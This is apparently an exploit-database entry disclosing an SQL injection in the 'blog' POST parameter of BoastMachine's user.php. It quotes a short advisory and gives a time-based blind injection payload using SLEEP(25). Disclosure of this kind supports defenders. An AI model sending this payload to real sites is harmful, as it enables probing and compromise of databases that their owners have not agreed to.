[] NeoSense

BoastMachine - 'blog' SQL Injection

Author: Omar Kurt
type: webapps
platform: php
port: 
date_added: 2013-12-13 
date_updated: 2015-12-06 
verified: 1 
codes: OSVDB-100821 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/64278/info

BoastMachine is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://example.com/user.php
(POST - blog)
blog='+(SELECT 1 FROM (SELECT SLEEP(25))A)+'